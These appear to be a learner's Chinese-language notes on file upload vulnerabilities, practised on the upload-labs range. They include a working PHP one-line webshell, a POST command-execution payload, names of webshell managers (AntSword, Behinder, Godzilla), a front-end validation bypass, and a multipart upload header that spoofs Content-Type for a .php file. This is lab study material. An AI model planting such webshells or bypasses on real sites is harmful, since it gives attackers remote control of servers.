概念·

暂时跳过了暴力和SQL注入

文件上传漏洞:

利用Web应用对上传文件过滤不严的漏洞,通常上传可执行的脚本文件(.php、.jsp、xml、cer等文件)或木马文件,获得当前的webshell(门)

一句话木马:

木马:寄宿在计算机中的一种非授权的远程控制程序;可在管理员未发现的情况下开放系统权限、泄露用户信息,甚至窃取整个计算机管理权限

一句话木马:一段简单的代码,短小精悍,隐蔽性强

实践·

php文件shell.php<?php @eval($_POST['mima']);?>

eval() 函数用来执行一个字符串表达式,并返回表达式的值。

HackBar POST操作:Load --> POST DATA

mima=system("whoaii");

我去,看来PHP真的感觉很多漏洞啊

那为什么要发明/不禁用eval呢😂;感觉这些漏洞的原理应当还是很有趣的,太邪恶了😈

手动测试一句话木马麻烦,后期用webshell管理工具

靶场·

upload-labs

Webshell工具·

蚁剑AntSword·

Github 蚁剑源码+加载库

添加:1.shell的地址2.密码

也可以输入url生成shell【其中使用了base64,rot13加密】

冰蝎Behinder·

github

jar:Java8 1.8

菜刀Caidao:凉了

哥斯拉Godzilla·

GitHub

jar:Java8 1.8

文件上传前端绕过·

例如:第一关只允许图片上传

  • 前端验证可以轻松绕过 修改js 直接删掉验证的函数

  • 有时修改会在Google失效,建议使用火狐/禁用JS

最后又讲了docker的配置 portainer.io 用 Portainer.io 来监控和管理 Docker 容器(1) | Linux 中国 - 知乎 (zhihu.com)

用于了解docker如何操作、搭建

pass02·

1
2
Content-Disposition: form-data; name="upload_file"; filename="han02.php"
Content-Type: image/png

博客说可以修改filename的文件名后缀,但自己不成功,只能修改content/type